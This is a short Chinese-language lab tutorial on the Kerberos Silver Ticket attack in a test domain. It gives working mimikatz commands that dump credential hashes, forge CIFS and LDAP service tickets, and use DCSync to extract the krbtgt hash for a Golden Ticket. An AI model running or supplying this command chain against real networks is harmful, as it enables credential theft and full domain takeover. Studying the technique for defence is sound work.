白银票据的原理和使用
- 白银票据(Silver Ticket)原理
- 白银票据的使用
服务账号是计算机名字+$用来管理服务的账号
白银票据(Silver Ticket)原理
白银票据是伪造本该由TGS返回的ST(服务票据),从而访问对应的服务
- 有server用户的hash就可以伪造出ST,且不经过KDC,但伪造的票只对部分服务起作用,权限比黄金票据低
白银票据的使用
-
控制了DC域控和域内主机WIN7
-
从域控获取基本信息
获取域名称
获取域SID值(末尾500代表是管理员)
获取服务账号的NTLM Hash
mimikatz sekurlsa::logonpasswords
-
域控下线,在WIN7伪造服务票据
此时WIN7无访问域控c盘权限
查看已有票据:mimikatz kerberos::list 或 powershell klist
清除已有票据:mimikatz kerberos::purge 或 powershell klist purge
伪造cifs服务票据:mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-281111118-1086056466-1450022951 /target:dc.hack.com /service:cifs /rc4:0e2fb6d70a6b2a0f4521bea5d91e399b /user:aaa /ptt
-
访问域控c盘,只有访问目录权限
尝试获取krbtgt的NTLM Hash,获取失败,需要有ldap服务的票据
mimikatz lsadump::dcsync /dc:dc.hack.com /domain:hack.com /user:krbtgt
-
WIN7伪造LDAP共享服务票据
mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-281111118-1086056466-1450022951 /target:dc.hack.com /service:LDAP /rc4:0e2fb6d70a6b2a0f4521bea5d91e399b /user:aaa /ptt
再次执行mimikatz获取Hash命令,成功得到krbtgt的NTLM Hash
即可制作黄金票据